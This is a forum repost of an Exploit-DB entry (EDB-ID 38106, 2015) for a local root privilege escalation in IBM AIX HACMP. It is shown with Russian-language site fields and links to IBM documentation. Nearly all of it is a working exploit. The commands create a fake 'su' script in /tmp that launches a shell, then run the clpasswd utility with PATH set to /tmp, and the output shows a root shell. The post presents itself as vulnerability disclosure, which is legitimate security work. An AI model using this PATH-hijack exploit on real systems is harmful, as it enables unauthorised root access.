Exploit IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
38106
Проверка EDB
  1. Пройдено
Автор
KRISTIAN ERIK HERMANSEN
Тип уязвимости
LOCAL
Платформа
AIX
CVE
null
Дата публикации
2015-09-08
IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation
Код:
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day

Let's kill some more bugs today and force vendor improvement :)

"""
$ cat /tmp/su
#!/bin/sh
/bin/sh
$ chmod +x /tmp/su
$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
# /usr/bin/whoami
root
"""

References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm

--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--
 
Источник
www.exploit-db.com

Похожие темы